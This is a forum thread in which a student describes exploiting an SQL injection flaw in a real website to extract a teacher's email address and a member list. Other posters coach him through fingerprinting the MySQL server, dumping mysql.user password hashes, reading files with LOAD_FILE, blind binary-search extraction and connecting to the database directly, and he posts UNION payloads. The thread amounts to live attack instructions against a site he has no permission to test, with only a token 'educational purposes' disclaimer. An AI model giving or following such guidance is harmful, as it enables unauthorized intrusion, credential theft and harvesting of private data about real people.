hi guys,
Now I have found my first site which is SQL-Injectionable
I've searched for information about my new teacher and I found this site. Now I'm trying to get the email adress of this teacher out of the database to send her a little welcome mail
I'll also send the webmaster an email how to fix this, its a real simple one where just ' hast to be filtered.

I know a lot of collum names (like email) but I have to get the name of the table, because I want to do something like "select email AS id from table_xyz"
(as email isn't showen and id is)

But how can I get this table_xyz? I guessed a lot of things, but none worked. Or is there another possibility to "rename" collums than with AS in the select part?

edit: She played a little game with us to get to know us and she didn't realy introduce herself. so I think she'll do this tomorrow. so I've serched for information to be able to say something like "you forgot to tell us that you like playing volleyball"

depends on what rdbms it is.

usually user() database() version()
give you a hint as to how it might be named. For example if they are german, tables will probably be too. and what
rdbms it is you are talking too

-If it's oracle, you can get it from system.tab (unless protected)
-if it's postgresql you can get it from hell i don't know this by heart,
-if it's myqsl it's not that trivial, but you could get the username/hashes from mysql.user and mysql.database iirc, and if that doesn't give you access to some admin pannel through the site; there is still a chance that you can just connect to the sql server from outside the network. Shouldn't be possible ... But people just don't care about basic networking security
-if it's msql there are some funny error messages, but you won't run into this too often

even if you can't get the table/Column names, there are tricks to get more data.

an obvious one is testing the load_file() function. Should be protected, but isn't always. It would allow you to load a file.
needless to say, you just load some of the webscripts, and read the table names from there.

depending on the versions of the rdbms you can also search for known vulnerabilities, some people just don't like
updating.

In conclusion, chances are pretty good that you can get quite a bit more than email adresses.

user(): I don't know
database(): I don't know the name, but its mysql
version(): 4.0 or newer
I'm quite sure the name is german (the attributes were ger) and the table has the prefix con_
I don't think there are hashes as it is no login table, but just a list of persons
I can't get error messages (I think they set error_reporting(0)
The load data function ... well ... If I knew the table name I would use it like "UPDATE [table] SET [col]=LOAD_FILE('[/srv/www/htdocs/file.php]') WHERE id=1;"
But as the query is like "SELECT * FROM table WHERE id= '".$_GET['id']."';" I have to exploit the unfiltered $_GET['id'] and I think it is not possible to "insert" the value of load_file to an variable...

And I didn't get the email adresses as they are not showen ... I just got a full list of all members and a list of some used collum names. email is one collum.

edit: It can be done like this, can't it? SELECT id,name FROM user WHERE user_ID = 1 UNION SELECT 1,LOAD_FILE('SELECT 1 AS id, LOAD_FILE('../../../srv/www/htdocs/index.php')');
I'll have to try this ... but now I have to go to school
thank you rhican

information for educational purpouses only off course

user() and the other functions are mysql functions

just do a binary search
? ... AND ascii(substring(user(),x,30)) > y
to determine the values.

and before you try to use the load_file you need to check that it isn't disabled so do
and load_file(some ABSOLUTE path) > 0, there is only a 1 in 4 chance it's enabled I
would estimate. It's off by default in most setups but some sites enable it because
they want to use it. It has to be an absolute path, this is the main reason why
"full path disclosure" bugs are bugs.

mysql.user is a table with the username and password of the sql users, getting the data
from there can be helpful. the passwod is hashed by the worst algorithm imaginable.

cool
I found this one http://dev.mysql.com/doc/refman/4.1/en/information-functions.html
its version 4.0 (this one was relased 03.2003 ... an update wouldn't be bad, I think)
now I know the user and I am able to get the database name
LOAD_FILE() doesn't work

I could also test if the servers system clock ist working right (CURDATE())

Is this perhaps helpful? show_tables

another thing I've found is this:

but as I don't want to destroy anything, this is not helping me

unless you get the logins from mysql.user, and get to login to the database server directly,
it's very unlikely that you will ever be able to use the "show tables" functionality